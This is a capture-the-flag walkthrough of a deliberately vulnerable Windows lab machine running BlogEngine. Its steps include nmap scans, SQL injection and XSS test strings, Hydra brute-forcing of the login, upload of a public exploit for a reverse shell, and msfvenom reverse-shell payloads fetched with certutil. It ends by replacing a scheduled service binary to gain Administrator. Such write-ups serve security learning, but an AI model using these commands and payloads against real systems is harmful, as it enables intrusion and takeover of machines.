[Task 1] Deploy the vulnerable Windows machine
- Deploy the machine and access its web server.
Port Scan
nmap -Pn <ip>
High port scan
nmap -p1000- -Pn <ip>
Service and OS scan
nmap -A -p 80,3389 <ip>
Vulnerable scan
nmap -p 80,3389 --script vuln <ip>
This machine may have some filter or firewall, because I can do only port scanning.
Conclusion:
There’re 2 services
Port no. 80 Microsoft-ISS?
Port no.3389 Microsoft remote desktop?
I guess it’s windows machine, because there’s port no.3389 is probably Remote Desktop Service.
2. Whats the name of the clown displayed on the homepage?
Access HTTP site
[Task 2] Using Hydra to brute-force a login
- What request type is the Windows website login form using?
Let’s explore the site
Post section
Try SQL Injection
1' or 1=1--+
SQL injection doesn’t work.
Try XSS
XSS doesn’t work neither.
<script>alert('XSS')</script>
Archive section, not useful
Contact section
Try SQL injection
Seems like the form is not properly implemented.
Login section, this site use “blogengine.net”
Default credentail is admin:admin
Let’s try it. Failed!!!
Let’s find other directory with gobuster
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://<ip>/ -x php,txt,html,aspxI access many links, but it’s as same as other sections
Let’s access robots.txt, not much useful.
Since there’s no other ways left. I’ll have to do brute-forcing with hydra.
Create user list first
echo admin > users.txtecho pennywise >> users.txtcat users.txt
Intercept login request w/ Burp Suite
It’s a POST request
2. Guess a username, choose a password wordlist and gain credentials to a user account!
Craft hydra command, copy the request and edit username value as “^USER^” and password value as “^PASS^”
Prepare hydra command
hydra -L <username list> -P <password list> <ip> http-post-form "/<login url>:username=^USER^&password=^PASS^:F=incorrect" -u -V -FReplace request
Run command
Credential is admin:1qaz2wsx .
[Task 3] Compromise the machine
- Now you have logged into the website, are you able to identify the version of the BlogEngine?
At about section, BlogEngine is version 3.3.6.0.
2. Use the exploit database archive to find an exploit to gain a reverse shell on this system. What is the CVE?
I can use seachsploit instead of finding in the site.
searchsploit blogengine
Copy it
searchsploit -m 46353
Review the script
3. Using the public exploit, gain initial access to the server.
Who is the webserver running as?
Edit IP address and port no.
Save as PostView.ascx
Back to dashboard, click at Content -> Posts -> New
Click directory icon
Upload the script
Create listener
nc -lvp 1234
Access the uploaded script
http://<ip>?theme=../../App_Data/files
Now I have a shell.
whoami
[Task 4] Windows Privilege Escalation
- Our netcat session is a little unstable, so lets generate another reverse shell using msfvenom.
Reference: https://netsec.ws/?p=331
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
Create HTTP Server
python -m SimpleHTTPServer 80
Back to victim’s machine, download file
cd \Windows\Tempcertutil -urlcache -f http://<ip>/shell.exe shell.exedir
Also, I download winPEAS.exe in case I need it later.
certutil -urlcache -f http://<ip>/winPEAS.exe winPEAS.exe
Back to attacker’s machine, set up metasploit handler
msfconsoleuse exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
Set RHOST <Remote IP>
set LHOST <Local IP>
set LPORT <Local Port>
Run
Back to victim’s machine, run shell.exe
shell.exe
Back to attacker’s machine, now I have a shell.
2. What is the OS version of this windows machine?
sysinfo
2. What is the name of the abnormal service running?
Try to escalate privilege
getsystemSeems like I can’t do by this method.
run post/multi/recon/local_exploit_suggester
I’ll try to run these exploits.
background
use exploit/windows/local/bypassuac_eventvwrset SESSION 1run
Failed!!!
I tried to run other exploits, but I failed with every exploits. I have to find another way.
2. What is the name of the binary you’re supposed to exploit?
I need to run WinPEAS.
shell
winPEAS.exe
Seems like there’re errors. I need to run simpler script, winPEAS.bat .
Download winPEAS.bat
certutil -urlcache -f http://10.11.11.30/winPEAS.bat winPEAS.bat
winPEAS.bat
3. Using this abnormal service, escalate your privileges! What is the user flag (on Jeffs Desktop)?
cd Program Files (x86)cd SystemSchedulerdir
cd Eventsdir
Read the log file
type 20198415519.INI_LOG.txtThere’s Message.exe with Administrator type.
Copy Message.exe as a backup in case I screw up.
cd ..copy Message.exe Message_bak.exe
I need to replace Message.exe with malicious file.
Back to attacker’s machine, create another shell file.
msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=1236 -f exe > Message.exe
Create listener
nc -lvp 1236
Download Message.exe
certutil -urlcache -f http://10.11.11.30/Message.exe Message.exe
Back to attacker’s machine at port no.1236 listener, wait for a moment
whoamiSeems like I can’t run this command.
Run whoami alternative
echo %username%I’m root/Administrator.
cd \Users\jeff\Desktopdirtype user.txt
4. What is the root flag?
cd \Users\Administrator\Desktoptype root.txt
